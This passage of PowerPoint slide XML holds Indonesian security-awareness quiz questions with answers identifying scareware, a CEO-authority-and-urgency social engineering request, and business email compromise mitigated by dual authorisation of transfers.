              <a:t>Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>scareware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menakut-nakuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>notifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> false alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>instruksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencurigakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>CEO Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menelepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>riset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pasar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diteruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>formulir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyatakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>formulir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengecualian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempersiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bundar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konferensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hadiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Apa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Social engineering – Authority + Urgency, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CEO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CEO) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>sense of urgency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memaksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Bisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>whaling attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bila</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekutif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyatakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer uang di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh dua orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tuntas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rincian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Business Email Compromise (BEC) / CEO Fraud (Financial Pretexting), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>social engineering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> fraud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khususnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>spear phishing / invoice fraud / CEO fraud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
